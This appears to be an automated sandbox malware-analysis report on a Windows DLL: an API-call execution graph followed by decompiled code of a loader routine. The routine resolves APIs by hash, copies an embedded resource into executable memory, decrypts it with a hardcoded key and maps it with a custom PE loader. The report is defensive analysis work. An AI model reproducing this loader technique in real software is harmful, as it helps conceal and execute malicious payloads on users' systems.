                                                                                                            execution_graph 20525 10006600 69 API calls 20367 1002c000 29 API calls 20368 10025c00 38 API calls ___initmbctable 20369 10010c02 39 API calls 20371 1000d40a 45 API calls 2 library calls 20527 1001f60c 11 API calls 20374 10036c0c 49 API calls 20530 1000f210 86 API calls 3 library calls 20531 10004610 LoadLibraryA 20375 10032010 69 API calls 20376 10016815 36 API calls _rand 20533 10010a14 6 API calls __lock 20377 1000fc18 85 API calls 20534 1002fe1b 78 API calls 3 library calls 20378 10030018 69 API calls 20380 10031c1d 79 API calls 20536 1002561d 39 API calls 20537 1000a221 CopyRect 20538 10027621 70 API calls 20540 1002ca2a 38 API calls 20381 1000882b BitBlt 20541 10024629 37 API calls 20542 1000be2c CopyRect GetClientRect InterlockedIncrement 20543 1000f62d 67 API calls 20544 10032a2d 7 API calls 20382 10001430 36 API calls 20545 10006630 115 API calls 20546 10022233 70 API calls 2 library calls 20383 10008434 RaiseException ctype 20384 1000c037 70 API calls __EH_prolog 20386 10028c3a SetViewportOrgEx SetViewportOrgEx 20387 10025438 37 API calls 20388 1002f03f 39 API calls 20389 10001440 35 API calls ctype 20550 10005240 72 API calls 20551 10006640 RaiseException EndDialog ctype 20552 1000d249 38 API calls 2 library calls 20391 1002084f 6 API calls ctype 20392 1000744e LocalFree 20554 10004650 GetProcAddress 20393 10008451 24 API calls 20555 10020657 RaiseException GetWindowLongA GetFocus ctype 20394 1000bc59 68 API calls 20396 1000885b PtVisible 20397 10034c5f 78 API calls ___initmbctable 20398 1000105d VirtualQuery GetSystemInfo VirtualQuery VirtualAlloc VirtualProtect 20557 1001aa5e 45 API calls ___initmbctable 20399 1000a862 52 API calls 20400 10007063 36 API calls ___free_lc_time 20401 10006c66 67 API calls 20560 1000f667 69 API calls 20402 10002468 ??3@YAXPAX 20403 10007469 RaiseException LocalAlloc ctype 20561 1000fa6a 69 API calls 20562 10038268 37 API calls ___initmbctable 20563 10031e6f 70 API calls 2 library calls 20405 10022c6f 67 API calls 20407 1000886f RectVisible 20565 10025a6d 49 API calls ___initmbctable 20566 10001a70 42 API calls ctype 20567 10004670 FreeLibrary 20408 10039070 PeekMessageA PeekMessageA PeekMessageA 20409 10031874 83 API calls 2 library calls 20410 10025478 37 API calls 20571 1000967a GetDlgItem 20411 1002b47f 46 API calls ___initmbctable 20412 1000887f TextOutA 20575 1002be83 44 API calls ___initmbctable 20413 1000ac82 86 API calls 20415 10028c86 OffsetViewportOrgEx OffsetViewportOrgEx 20577 10032286 71 API calls 20416 10024c8e 50 API calls 2 library calls 20580 1001d28c 74 API calls ctype 20080 10005090 20081 100050a0 20080->20081 20082 10005099 ExitProcess 20080->20082 20085 10004780 20081->20085 20086 10004869 20085->20086 20087 1000495d 20085->20087 20086->20087 20088 10004c84 bsearch 20086->20088 20089 100049ec malloc 20086->20089 20088->20087 20089->20087 20090 10004b0b qsort 20089->20090 20090->20088 20418 10007090 GlobalAlloc 20419 10001090 GetThreadLocale GetLocaleInfoA GetACP 20420 1000dc90 36 API calls 3 library calls 20581 10026a96 67 API calls 20582 10037a96 6 API calls 20583 1000c29a VariantClear SysFreeString SysFreeString SysFreeString _rand 20422 1000889b ExtTextOutA 20585 1000be9c GetClientRect CopyRect 20587 100336a6 67 API calls ctype 20425 1001d8a6 48 API calls 20426 100344ad 26 API calls 20588 1002f6ad 10 API calls 20590 100342b3 SetBkColor ExtTextOutA 20591 1000aeb3 67 API calls ctype 20428 1000e4b6 45 API calls 2 library calls 20592 10008eb6 GetWindowTextA lstrcpynA lstrlenA 20429 100040b9 realloc IsBadReadPtr 20430 1000e8b9 80 API calls 2 library calls 20431 100084bb 66 API calls 20433 100088c0 TabbedTextOutA 20434 100254c3 39 API calls 20594 10020ac0 DefWindowProcA CallWindowProcA 20595 10006ec5 45 API calls 20596 10030ec9 166 API calls 20597 100376cf EnterCriticalSection LeaveCriticalSection 20437 100050d0 134 API calls 20438 10028cd2 SetViewportExtEx SetViewportExtEx 20598 1001fad1 69 API calls ctype 20599 1002d2d6 91 API calls 20439 1002ccd7 48 API calls 20601 1000aadb GetWindowLongA SetWindowLongA SetWindowPos 20606 100012e0 EnableWindow 20607 10038ae0 76 API calls ctype 20441 100084e7 66 API calls 20609 10029ae8 37 API calls ___initmbctable 20442 1002c0ed 71 API calls ___initmbctable 20443 1000c0ef ReleaseDC 20610 1000beef 71 API calls __EH_prolog 20444 100014f0 47 API calls 20445 100288f3 69 API calls 20447 100344f5 30 API calls 20448 100088f8 DrawTextA 20449 1002f8fb 66 API calls 20614 10038ef8 PeekMessageA DispatchMessageA PeekMessageA 20450 1000acfc IsWindowVisible 20615 10027afd 82 API calls 2 library calls 20451 10001100 GetVersionExA InterlockedExchange 20452 1002f502 82 API calls ctype 20453 10001500 37 API calls 3 library calls 20455 10008d08 80 API calls 20456 1000850a 66 API calls 20458 1002c50c 84 API calls 20459 1003210c 89 API calls 20617 1002fb11 GetClientRect 20461 10008914 DrawTextExA 20462 1000c116 68 API calls 20464 1001d919 SendMessageA ScreenToClient SendMessageA 20466 10028d1e ScaleViewportExtEx ScaleViewportExtEx 20467 1002cd1e 9 API calls 20147 1001131c 20150 10011328 __lock 20147->20150 20148 10011379 20156 100113b6 __lock 20148->20156 20203 10006120 20148->20203 20150->20148 20150->20156 20157 1001119b 20150->20157 20151 1001138d 20153 100113a3 20151->20153 20154 1001119b 99 API calls 20151->20154 20155 1001119b 99 API calls 20153->20155 20153->20156 20154->20153 20155->20156 20158 1001128b 20157->20158 20159 100111ab __lock 20157->20159 20160 100112bb 20158->20160 20161 1001128f 20158->20161 20162 100111b5 GetVersionExA 20159->20162 20163 100112c0 20160->20163 20164 10011304 20160->20164 20167 100112aa 20161->20167 20185 100112b9 20161->20185 20247 10011f67 20161->20247 20166 100111cc 20162->20166 20162->20185 20252 1001382a 20163->20252 20164->20185 20281 10015355 37 API calls 20164->20281 20221 10013a83 HeapCreate 20166->20221 20250 1001634a 36 API calls ___free_lc_time 20167->20250 20168 100112cc 20172 100112d4 FlsSetValue 20168->20172 20168->20185 20175 100112e6 20172->20175 20176 100112fa 20172->20176 20174 100112af 20251 1001516d FlsFree 20174->20251 20181 100112eb GetCurrentThreadId 20175->20181 20271 100107c8 20176->20271 20178 10011217 20178->20185 20259 10015384 44 API calls _rand 20178->20259 20180 100112b4 20183 10013ad4 VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 20180->20183 20181->20185 20183->20185 20184 10011225 20186 10011229 20184->20186 20189 10011238 GetCommandLineA 20184->20189 20185->20148 20260 10013ad4 20186->20260 20188 1001122e 20188->20185 20229 1001666b 42 API calls 2 library calls 20189->20229 20191 10011248 20230 1001614c 20191->20230 20194 10011284 20270 1001516d FlsFree 20194->20270 20197 1001125b 20198 1001126f 20197->20198 20267 10016396 58 API calls 5 library calls 20197->20267 20198->20188 20269 1001634a 36 API calls ___free_lc_time 20198->20269 20201 10011264 20201->20198 20268 10011e29 39 API calls 20201->20268 20204 10006566 20203->20204 20205 1000612c 20203->20205 20204->20151 20326 10005040 20205->20326 20207 10006131 20208 1000656f 20207->20208 20211 10006139 20207->20211 20350 10011135 43 API calls __lock 20208->20350 20210 10006579 20210->20151 20212 1000634f FindResourceW LoadResource SizeofResource 20211->20212 20213 10006432 VirtualAlloc 20212->20213 20214 1000638c VirtualAllocExNuma 20212->20214 20215 100064d0 memcpy malloc 20213->20215 20214->20215 20349 10002340 malloc ??3@YAXPAX 20215->20349 20217 10006508 20218 1000651f ??3@YAXPAX 20217->20218 20332 10005260 20218->20332 20220 1000654b 20220->20204 20222 10013aa3 20221->20222 20223 10013acd 20221->20223 20224 10013ad0 20222->20224 20225 10013ab2 20222->20225 20223->20178 20224->20178 20282 10013b53 HeapAlloc 20225->20282 20227 10013abc 20227->20224 20228 10013ac1 HeapDestroy 20227->20228 20228->20223 20229->20191 20283 100107b6 20230->20283 20232 100161a1 GetStartupInfoA 20234 100162a4 20232->20234 20235 100161bb 20232->20235 20236 10016334 SetHandleCount 20234->20236 20237 100162d3 GetStdHandle 20234->20237 20246 100162f8 20234->20246 20235->20234 20238 1001622c 20235->20238 20239 100107b6 __getbuf 35 API calls 20235->20239 20240 10011252 20236->20240 20237->20234 20241 100162e1 GetFileType 20237->20241 20238->20234 20242 10016252 GetFileType 20238->20242 20243 1001625d 20238->20243 20239->20235 20240->20194 20266 100165c9 59 API calls 2 library calls 20240->20266 20241->20234 20242->20238 20242->20243 20243->20238 20243->20240 20286 10019599 GetModuleHandleA GetProcAddress __lock 20243->20286 20246->20234 20246->20240 20287 10019599 GetModuleHandleA GetProcAddress __lock 20246->20287 20305 10011e93 20247->20305 20249 10011f72 20249->20167 20250->20174 20256 10013836 __lock _rand 20252->20256 20253 100138a3 RtlAllocateHeap 20253->20256 20255 100138cf __lock 20255->20168 20256->20253 20256->20255 20320 10013a38 35 API calls __lock 20256->20320 20321 1001437a 5 API calls _rand 20256->20321 20322 100138d4 LeaveCriticalSection __lock 20256->20322 20259->20184 20261 10013b46 HeapDestroy 20260->20261 20262 10013add 20260->20262 20261->20188 20263 10013b34 HeapFree 20262->20263 20264 10013b00 VirtualFree VirtualFree HeapFree 20262->20264 20263->20261 20264->20264 20265 10013b32 20264->20265 20265->20263 20266->20197 20267->20201 20268->20198 20269->20194 20273 100107d4 __lock 20271->20273 20272 10010833 __lock 20272->20185 20273->20272 20280 10010810 20273->20280 20323 10013a38 35 API calls __lock 20273->20323 20274 10010825 RtlFreeHeap 20274->20272 20276 10010805 20325 1001081b LeaveCriticalSection __lock 20276->20325 20277 100107eb ___free_lc_time 20277->20276 20324 10013bc6 VirtualFree VirtualFree HeapFree __shift 20277->20324 20280->20272 20280->20274 20281->20185 20282->20227 20288 1001078a 20283->20288 20286->20243 20287->20246 20289 100107b3 20288->20289 20291 10010791 _rand 20288->20291 20289->20232 20289->20240 20291->20289 20292 1001070f 20291->20292 20293 1001071b __lock 20292->20293 20294 1001074e 20293->20294 20302 10013a38 35 API calls __lock 20293->20302 20296 10010769 RtlAllocateHeap 20294->20296 20297 10010778 __lock 20294->20297 20296->20297 20297->20291 20298 10010736 20303 1001437a 5 API calls _rand 20298->20303 20300 10010741 20304 10010781 LeaveCriticalSection __lock 20300->20304 20302->20298 20303->20300 20304->20294 20306 10011e9f __lock 20305->20306 20317 10013a38 35 API calls __lock 20306->20317 20308 10011ea6 20309 10011eb7 GetCurrentProcess TerminateProcess 20308->20309 20310 10011ec7 ___initmbctable 20308->20310 20309->20310 20318 10011f42 LeaveCriticalSection __lock 20310->20318 20312 10011f2a 20313 10011f50 __lock 20312->20313 20314 10011f2f 20312->20314 20313->20249 20319 10011dcf GetModuleHandleA GetProcAddress ExitProcess 20314->20319 20317->20308 20318->20312 20320->20256 20321->20256 20322->20256 20323->20277 20324->20276 20325->20280 20327 100107b6 __getbuf 35 API calls 20326->20327 20329 1000504b 20327->20329 20328 10005052 20328->20207 20329->20328 20330 100107c8 ___free_lc_time 35 API calls 20329->20330 20331 10005077 20330->20331 20331->20207 20333 1000600e 20332->20333 20335 10005312 20332->20335 20333->20220 20334 100056c8 GetNativeSystemInfo 20337 10005753 20334->20337 20335->20333 20335->20334 20336 10005a04 GetProcessHeap HeapAlloc 20338 10005a9d 20336->20338 20339 10005ae8 20336->20339 20337->20333 20337->20336 20338->20220 20340 10005fdb 20339->20340 20342 10005c79 memcpy 20339->20342 20348 1000601b 20340->20348 20360 10004dd0 ??3@YAXPAX ??3@YAXPAX GetProcessHeap HeapFree 20340->20360 20351 10002ca0 memset memcpy 20342->20351 20344 10005e55 20344->20340 20352 10003f40 IsBadReadPtr realloc IsBadReadPtr 20344->20352 20346 10005f8c 20346->20340 20353 10003570 20346->20353 20348->20220 20349->20217 20350->20210 20351->20344 20352->20346 20357 10003644 20353->20357 20354 10003a98 20355 10003310 VirtualProtect 20354->20355 20356 10003aaf 20355->20356 20356->20340 20357->20354 20359 10003ac0 20357->20359 20361 10003310 20357->20361 20359->20340 20360->20333 20362 10003322 20361->20362 20363 1000332b 20361->20363 20362->20357 20364 10003500 VirtualProtect 20363->20364 20365 1000337a 20363->20365 20364->20357 20365->20357 20469 1000f922 77 API calls ctype 20620 10008f22 SetWindowTextA 20470 1002292c 104 API calls 20621 10006730 44 API calls 20472 10008933 GrayStringA 20473 1000c934 CoTaskMemFree 20474 10009136 68 API calls 20622 10034b35 RegOpenKeyExA RegQueryValueExA RegCloseKey RegCloseKey 20623 10022738 26 API calls 20624 1002c73e 73 API calls 20625 10038f3e PeekMessageA 20626 10001340 145 API calls 20627 10008740 InitializeCriticalSection __lock 20629 10016b44 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20631 10008f46 InterlockedIncrement 20632 10031f4a 72 API calls 2 library calls 20633 1002fb4e GetBkColor SetBkColor ExtTextOutA SetBkColor ExtTextOutA 20634 10026b4f 69 API calls _rand 20476 1002f953 25 API calls 20477 10008152 VariantClear 20636 10009757 PtInRect RaiseException ctype 20637 10008f5d InterlockedDecrement ctype 20638 1002bf62 SetRectEmpty 20479 1000f562 78 API calls ctype 20480 10008963 Escape 20639 10021761 25 API calls 20481 1000c16b 83 API calls __EH_prolog 20482 1000856b SendMessageA 20640 1000af6d 67 API calls 20483 10006d72 ModifyMenuA 20484 10028d76 SetWindowExtEx SetWindowExtEx 20641 10018775 54 API calls 20643 1002bb75 45 API calls ___initmbctable 20644 10009b77 87 API calls 2 library calls 20646 10023f7e 78 API calls 20647 1002cf7e 73 API calls 20648 1003437e 84 API calls 20485 1000857e ImageList_Draw 20649 1001cb7f 8 API calls 20486 1001ed7e 67 API calls 20650 10038783 FormatMessageA lstrcpynA LocalFree 20488 10031d85 70 API calls 2 library calls 20489 1003298b 84 API calls 20651 1003478f 86 API calls 20652 10031793 GetWindowLongA GetWindowLongA SetWindowLongA SetWindowPos 20653 10030b92 171 API calls 20490 10025d91 79 API calls 20654 10036b96 GetWindowLongA GetParent IsZoomed GetSystemMetrics GetSystemMetrics 20092 100011a0 20095 100350ea 20092->20095 20094 100011aa 20096 100350f4 __EH_prolog 20095->20096 20105 10035766 20096->20105 20099 1003511a 20110 100373b5 30 API calls ctype 20099->20110 20102 10035128 20111 10037855 20102->20111 20106 10035770 __EH_prolog 20105->20106 20122 1003570d 25 API calls 20106->20122 20108 10035102 20108->20099 20109 10011f76 35 API calls 3 library calls 20108->20109 20109->20099 20110->20102 20112 1003785f __EH_prolog 20111->20112 20114 10037884 20112->20114 20118 10037895 20112->20118 20123 1003768d TlsAlloc 20112->20123 20126 10037446 EnterCriticalSection 20114->20126 20117 100378a4 20119 100378aa 20117->20119 20120 1003513a GetCurrentThread GetCurrentThreadId 20117->20120 20136 10037552 EnterCriticalSection 20118->20136 20141 10037732 9 API calls 2 library calls 20119->20141 20120->20094 20122->20108 20124 100376c1 InitializeCriticalSection 20123->20124 20125 100376bc 20123->20125 20124->20114 20125->20124 20127 10037467 20126->20127 20129 1003751c _rand 20127->20129 20130 100374b0 GlobalHandle GlobalUnlock GlobalReAlloc 20127->20130 20131 100374a0 GlobalAlloc 20127->20131 20128 10037533 LeaveCriticalSection 20128->20118 20129->20128 20132 100374d5 20130->20132 20131->20132 20133 100374fc GlobalLock 20132->20133 20134 100374e0 GlobalHandle GlobalLock 20132->20134 20135 100374ee LeaveCriticalSection 20132->20135 20133->20129 20134->20135 20135->20133 20137 1003757a LeaveCriticalSection 20136->20137 20138 10037569 20136->20138 20137->20117 20138->20137 20140 1003756e TlsGetValue 20138->20140 20140->20137 20141->20120 20658 100013a0 71 API calls 20659 1000eba3 69 API calls ctype 20494 100085a5 66 API calls 20144 100373a5 20145 10037855 ctype 24 API calls 20144->20145 20146 100373b4 20145->20146 20495 1000c9a7 103 API calls 2 library calls 20496 1001f5a6 111 API calls 20661 100257a8 39 API calls ctype 20664 1000bbb6 SetWindowPos 20498 100089b7 66 API calls 20665 10024fbb 98 API calls 3 library calls 20499 1000a9bd GetWindowLongA __EH_prolog 20501 100071bf 70 API calls ctype 20502 100319bc 71 API calls ctype 20503 100081c0 lstrcmpW 20504 10028dc2 ScaleWindowExtEx ScaleWindowExtEx 20666 1000bfc5 IntersectRect EqualRect IsRectEmpty InvalidateRect 20505 10006dc9 30 API calls ctype 20506 100369c8 62 API calls 20668 1001dfcd 67 API calls 20507 100235cf 82 API calls 3 library calls 20669 10038fcd PeekMessageA GetCurrentThreadId PostThreadMessageA 20142 100045d0 VirtualAlloc 20508 100011d0 88 API calls ctype 20509 100019d0 66 API calls 20670 10022fd3 68 API calls ctype 20511 100089d8 66 API calls 20513 100051e0 66 API calls ctype 20514 10008de0 66 API calls 20673 10007be5 11 API calls 20517 100095e7 OffsetRect RaiseException ctype 20674 100303ea 106 API calls 20675 100077ee 80 API calls 20143 100045f0 VirtualFree 20677 10024bf4 79 API calls ctype 20521 10008dfb 47 API calls ___initmbctable 20679 1002cbfe 90 API calls ___initmbctable 20522 1000f9fd 69 API calls 20680 1001effc 34 API calls ctype 20523 100389fc 66 API calls

                                                                                                            Executed Functions

                                                                                                            Function 10006120 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 301memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x76ec66e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}


























































                                                                                                            0x10006126
                                                                                                            0x10006566
                                                                                                            0x1000656c
                                                                                                            0x1000612c
                                                                                                            0x1000612c
                                                                                                            0x10006131
                                                                                                            0x10006133
                                                                                                            0x1000656f
                                                                                                            0x10006574
                                                                                                            0x1000657c
                                                                                                            0x1000657f
                                                                                                            0x10006139
                                                                                                            0x10006139
                                                                                                            0x1000613a
                                                                                                            0x1000613b
                                                                                                            0x1000613c
                                                                                                            0x1000613d
                                                                                                            0x10006142
                                                                                                            0x10006147
                                                                                                            0x1000614e
                                                                                                            0x10006153
                                                                                                            0x10006158
                                                                                                            0x1000615d
                                                                                                            0x10006163
                                                                                                            0x10006169
                                                                                                            0x1000616f
                                                                                                            0x10006175
                                                                                                            0x1000617b
                                                                                                            0x10006181
                                                                                                            0x10006187
                                                                                                            0x1000618c
                                                                                                            0x10006191
                                                                                                            0x10006196
                                                                                                            0x1000619b
                                                                                                            0x100061a0
                                                                                                            0x100061a5
                                                                                                            0x100061aa
                                                                                                            0x100061ac
                                                                                                            0x100061b1
                                                                                                            0x100061b6
                                                                                                            0x100061bb
                                                                                                            0x100061c0
                                                                                                            0x100061c5
                                                                                                            0x100061ca
                                                                                                            0x100061d9
                                                                                                            0x100061db
                                                                                                            0x100061e0
                                                                                                            0x100061e1
                                                                                                            0x100061e6
                                                                                                            0x100061eb
                                                                                                            0x100061ec
                                                                                                            0x100061f1
                                                                                                            0x100061f6
                                                                                                            0x100061fb
                                                                                                            0x100061fc
                                                                                                            0x10006201
                                                                                                            0x10006206
                                                                                                            0x1000620b
                                                                                                            0x1000620c
                                                                                                            0x10006211
                                                                                                            0x10006216
                                                                                                            0x1000621b
                                                                                                            0x1000621c
                                                                                                            0x10006221
                                                                                                            0x10006226
                                                                                                            0x1000622b
                                                                                                            0x1000622c
                                                                                                            0x10006231
                                                                                                            0x10006236
                                                                                                            0x1000623b
                                                                                                            0x1000623c
                                                                                                            0x10006241
                                                                                                            0x10006246
                                                                                                            0x1000624b
                                                                                                            0x1000624c
                                                                                                            0x10006251
                                                                                                            0x10006259
                                                                                                            0x1000625e
                                                                                                            0x1000625f
                                                                                                            0x10006264
                                                                                                            0x10006269
                                                                                                            0x1000626e
                                                                                                            0x1000626f
                                                                                                            0x10006274
                                                                                                            0x10006279
                                                                                                            0x1000627e
                                                                                                            0x1000627f
                                                                                                            0x10006284
                                                                                                            0x10006289
                                                                                                            0x1000628e
                                                                                                            0x1000628f
                                                                                                            0x10006294
                                                                                                            0x10006299
                                                                                                            0x1000629e
                                                                                                            0x1000629f
                                                                                                            0x100062a4
                                                                                                            0x100062a9
                                                                                                            0x100062ae
                                                                                                            0x100062af
                                                                                                            0x100062b4
                                                                                                            0x100062b9
                                                                                                            0x100062be
                                                                                                            0x100062bf
                                                                                                            0x100062c4
                                                                                                            0x100062c9
                                                                                                            0x100062ce
                                                                                                            0x100062cf
                                                                                                            0x100062d4
                                                                                                            0x100062dc
                                                                                                            0x100062e1
                                                                                                            0x100062e2
                                                                                                            0x100062e7
                                                                                                            0x100062ec
                                                                                                            0x100062f1
                                                                                                            0x100062f2
                                                                                                            0x100062f7
                                                                                                            0x100062fc
                                                                                                            0x10006301
                                                                                                            0x10006302
                                                                                                            0x10006307
                                                                                                            0x1000630c
                                                                                                            0x10006311
                                                                                                            0x10006312
                                                                                                            0x10006317
                                                                                                            0x1000631c
                                                                                                            0x10006321
                                                                                                            0x10006322
                                                                                                            0x10006327
                                                                                                            0x1000632e
                                                                                                            0x10006333
                                                                                                            0x10006334
                                                                                                            0x1000633a
                                                                                                            0x1000633f
                                                                                                            0x10006344
                                                                                                            0x10006345
                                                                                                            0x1000634a
                                                                                                            0x1000634f
                                                                                                            0x10006361
                                                                                                            0x10006366
                                                                                                            0x10006368
                                                                                                            0x10006374
                                                                                                            0x1000637e
                                                                                                            0x10006380
                                                                                                            0x10006386
                                                                                                            0x10006432
                                                                                                            0x10006438
                                                                                                            0x1000643e
                                                                                                            0x10006443
                                                                                                            0x10006449
                                                                                                            0x10006459
                                                                                                            0x1000646d
                                                                                                            0x10006474
                                                                                                            0x10006476
                                                                                                            0x10006481
                                                                                                            0x10006487
                                                                                                            0x10006494
                                                                                                            0x100064c4
                                                                                                            0x100064c4
                                                                                                            0x100064ca
                                                                                                            0x1000638c
                                                                                                            0x1000638c
                                                                                                            0x10006392
                                                                                                            0x10006398
                                                                                                            0x1000639e
                                                                                                            0x100063a4
                                                                                                            0x100063b9
                                                                                                            0x100063d6
                                                                                                            0x100063fa
                                                                                                            0x10006427
                                                                                                            0x10006427
                                                                                                            0x100064d5
                                                                                                            0x100064d9
                                                                                                            0x100064e4
                                                                                                            0x100064f1
